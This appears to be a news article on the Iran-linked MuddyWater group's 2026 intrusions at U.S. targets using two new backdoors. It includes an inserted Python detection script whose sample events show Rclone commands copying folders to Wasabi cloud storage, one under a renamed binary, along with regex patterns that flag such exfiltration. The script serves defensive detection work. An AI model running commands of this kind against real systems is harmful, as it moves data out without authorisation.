MuddyWater, a hacking group linked to Iranian intelligence services, has infiltrated the networks of a U.S. bank, an airport, and an American software company using two newly discovered backdoors. The operation, identified by Symantec, appears to have intensified following U.S. and Israeli strikes against Iran in late February.

Two New Backdoors Discovered

Symantec’s Threat Hunter team uncovered the campaign. Since early February 2026, the MuddyWater group—also known as Seedworm—has been deploying two previously unknown malware tools.

The first, Dindoor, is built on Deno, a JavaScript runtime, and was signed with a certificate issued under the name “Amy Cherne.”

The second, Fakeset, is written in Python and signed by “Donald Gay,” a name previously associated with older MuddyWater tools such as Stagecomp and Darkcomp.

In both cases, the attackers attempted to exfiltrate data to the Wasabi cloud storage service using Rclone, a synchronization tool widely used by system administrators.
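Because Rclone is a legitimate administration tool, hunting for the exfiltration pattern described above is a matter of baselining rather than blocking. The following added example (not from Symantec's report) triages constructed process-creation events for Rclone transfer syntax and Wasabi endpoints; the wasabisys.com endpoint domain and the sanctioned-remote baseline are assumptions.

```python
import re

# Constructed process-creation events (host, user, command line); none come from Symantec's report.
SAMPLE_EVENTS = [
    ("fs-02", "svc_backup", "rclone sync /srv/shares backups:corp-shares --transfers 4"),
    ("ws-117", "jdoe", "rclone.exe copy C:\\Finance\\Q1 :s3,provider=Wasabi,endpoint=s3.wasabisys.com:drop-7f"),
    ("ws-118", "asmith", "C:\\Windows\\Temp\\svchost32.exe copy C:\\Users\\asmith\\Documents wb:out --s3-endpoint s3.wasabisys.com"),
    ("ws-119", "bking", "powershell.exe -NoProfile -Command Get-Process"),
]

# Assumed baseline of sanctioned (user, remote name) pairs; Rclone is a legitimate admin tool,
# so detection without this kind of tuning produces noise.
SANCTIONED_REMOTES = {("svc_backup", "backups")}

RCLONE_BIN = re.compile(r"(?:^|[\\/\s])rclone(?:\.exe)?\b", re.IGNORECASE)
# Rclone's transfer verbs take "<src> <dest>", where a remote is "name:path" or ":backend,opt=val:path".
RCLONE_TRANSFER = re.compile(r"\b(copy|sync|move|copyto|moveto)\s+\S+\s+(:?[\w-]*(?:,[^\s:]+)?):\S*", re.IGNORECASE)
# Wasabi's S3 endpoints live under wasabisys.com (real provider domain; assumed relevant to this environment).
WASABI = re.compile(r"wasabisys\.com|provider=wasabi", re.IGNORECASE)


def triage(events, sanctioned=SANCTIONED_REMOTES):
    """Return one finding per suspicious Rclone-style transfer: (host, user, severity, reasons)."""
    findings = []
    for host, user, cmdline in events:
        is_rclone = bool(RCLONE_BIN.search(cmdline))
        transfer = RCLONE_TRANSFER.search(cmdline)
        if not (is_rclone or transfer):
            continue  # unrelated process
        reasons, severity = [], "low"
        if transfer:
            remote = transfer.group(2).lstrip(":").split(",")[0]
            if (user, remote) in sanctioned:
                continue  # known backup job: suppress
            severity = "medium"
            reasons.append(f"unsanctioned transfer to remote '{remote}'")
            if not is_rclone:
                reasons.append("rclone syntax under a non-rclone binary name (possible renamed tool)")
        if WASABI.search(cmdline):
            severity = "high"
            reasons.append("destination is Wasabi cloud storage")
        findings.append((host, user, severity, reasons))
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The renamed-binary check matters because the command-line grammar survives even when the executable is dropped under an innocuous name.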

Sensitive Targets and a Possible Link to Israel

The victims include a U.S. bank, an airport, a software publisher linked to the defense and aerospace sectors with operations in Israel, as well as several NGOs in the United States and Canada.

According to researchers, MuddyWater had already established a presence inside these networks in early February. However, activity significantly increased after February 28, following the launch of Operation Epic Fury, a series of coordinated military strikes by the United States and Israel against Iran.

The strikes reportedly resulted in the death of Iran’s Supreme Leader Ali Khamenei on March 1, and security researchers observed that Iranian cyber operations accelerated shortly afterward.

FBI Confirms Ties to Tehran

The FBI, CISA, and the UK’s National Cyber Security Centre (NCSC) believe MuddyWater has been operating on behalf of Iran’s Ministry of Intelligence since 2018.

One key factor supporting this attribution is the reuse of digital signing certificates between the newly discovered backdoors and previously known tools used by the group.

The analysis published by Symantec has also been corroborated by Google, Microsoft, and Kaspersky.

As for the exact objective of the intrusions, researchers remain cautious. The campaign could involve espionage, intelligence gathering, or preparation for potential sabotage operations.

MuddyWater typically relies on phishing campaigns and the exploitation of vulnerabilities in internet-facing applications to gain access to targeted networks.

Perhaps the most surprising aspect of the operation is how long the attackers remained undetected: weeks of presence inside highly sensitive networks without triggering an alarm.

Given the current geopolitical tensions between Iran, the United States, and Israel, it is likely that Symantec has only uncovered part of the broader campaign.
